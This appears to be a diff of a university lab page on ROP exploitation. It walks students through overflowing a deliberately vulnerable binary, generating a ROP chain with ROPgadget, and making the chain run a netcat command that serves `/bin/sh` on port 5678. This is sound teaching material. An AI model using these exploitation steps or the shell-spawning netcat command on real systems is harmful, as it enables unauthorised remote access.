cs-uob/COMSM0049/docs/labs/LAB4.md

 # Lab 4 - ROP based Exploitation

-Watch the [video](https://web.microsoftstream.com/video/2463603d-0f94-4e62-863b-f1c40918f072) for details on this lab.
-Concrete steps are also outlined below.
-To see a step by step process of using ROPGadget (the ones we saw in the lecture video), check [this page](ropgadget-steps.md)

-<iframe width="640" height="360" src="https://web.microsoftstream.com/embed/video/2463603d-0f94-4e62-863b-f1c40918f072?autoplay=false&amp;showinfo=true" allowfullscreen style="border:none;"></iframe>

-**Aim**: open a port on the victim machine using netcat tool that returns a shell (reverse shell exploit).
+**Task 1**: Exploit the program and use ROPgadget to generate a ROP shellcode.

+**Task 2**: Write using ROPgadget a custom shellcode to spawn a reverse shell.

 Setting up the environment:

 0. download ROPGadget and install from: [URL](https://github.com/JonathanSalwan/ROPgadget).
 Its a github repo, so you can either clone it or (suggested) simple use "Download zip" option.
-1. Download netcat (the latest release of netcat that comes pre-installed in Ubunut has removed a particular option (-e) that we need.
+1. Download netcat (the latest release of netcat that comes pre-installed in Ubuntu has removed a particular option (-e) that we need.
 Having said that, official netcat release still shipped with that option!
 So, we are not completely artificial ;).
 [URL:](https://sourceforge.net/projects/netcat/).
 However, the same is also avaialble [here](../code/nc071.tar.gz).
-2. untar it and build-- `./configure` and `make` command (**do not do** *make install*!)
+2. untar it and build: `./configure` and `make` command (**do not do** *make install*!)
-3. move `src/netcat` to `/tmp/--` `cp src/netcat /tmp/nc` (check if the binary is working as expected `/tmp/nc --help`).
+3. move `src/netcat` to `/tmp/nc`: `cp src/netcat /tmp/nc` (check if the binary is working as expected `/tmp/nc --help`).
 4. Compile [vuln3.c](../code/vuln3.c) as `gcc -fno-stack-protector -m32 -static vuln3.c -o vuln3-32`
-5. Use the same trick we saw in the lecture video to find the offsets where the input starts overwriting the saved return addr.
+5. Find the amount of padding you'll need to overflow the buffer and start overwriting the saved return address.
-6. Start populating the supplied ROP exploit python script: [exploit-nc-skeleton.py](../code/exploit-rop-nc-skeleton.py).
-For this step, you use ROPGadget.py to find ROP chain:
+6. Use ROPgadget to build a ROP shellcode.

-		./ROPgadget.py --binary vuln3-32 --ropchain > out-rop.txt
+		ROPgadget --binary vuln3-32 --ropchain > out-rop.txt

-\[Note: in case your ROPgadget reports that it could not find a chain on this binary, you can use [this binary](../code/vuln3-32).
-In worst case, if that still does not work, use VM that you used in your lab 1 -2 and repeat the whole steps\]
-7. You have helper files to consult [exploit-nc.py](../code/exploit-nc.py) and [exploit-rop.py](../code/exploit-rop.py)
+   Have a look at `out-rop.txt`.
+You'll see that at the bottom there is a Python program which you can complete to generate your shellcode exploit (in particular the buffer padding).
+Run the program generate the exploit and test it works with the vulnerable program.
+7. The shellcode in the previous step execve'd `/bin/sh`.
+This time we'd like you to run the following command:

+		/tmp/nc -lnp 5678 -tte /bin/sh

+   This command will spawn a reverse-shell server listening on localhost port 5678 that feeds all the input it gets into `/bin/sh`.
+Effectively enabling you to run programs remotely!
+We're giving helper files to consult which provide a similar exploit for a different machine: [exploit-nc.py](../code/exploit-nc.py), but you'll need to get it working on *your* machine.
+In particular the gadgets, configuration and Python version may be different!
 8. Once successful, open another terminal and type:
 ```
 $/tmp/nc 127.0.0.1 5678
 pwd
 ```

+# Hints

+1. To figure out the padding needed to overflow the buffer try using binary search.
+If you run `perl -e 'print "A"x124, "DCBA"' >input` you can quickly test different inputs.
+What would you expect to see when you have correctly got control of the return address?
+What would you expect to see if you've gone too far compared to not far enough?
+2. Can't concatenate strings and bytes?
+Just use bytes! `bytes("Your string", "ascii")`.
+3. Try and get the exploit chain running first!
+Break on the first gadget (In GDB: `b *0x08BLABLA`) and check it is working as expected.
+Are things going into the right registers?
+(In GDB: `si`: step instruction, `i r`: info registers)
+4. Once you're convinced the ROP chain is running the `strace` tool is very helpful to debug what system calls *actually* get made by your program.
+The `-v` flag will show all the arguments to system calls, `-e trace=execve` to just show `execve` calls.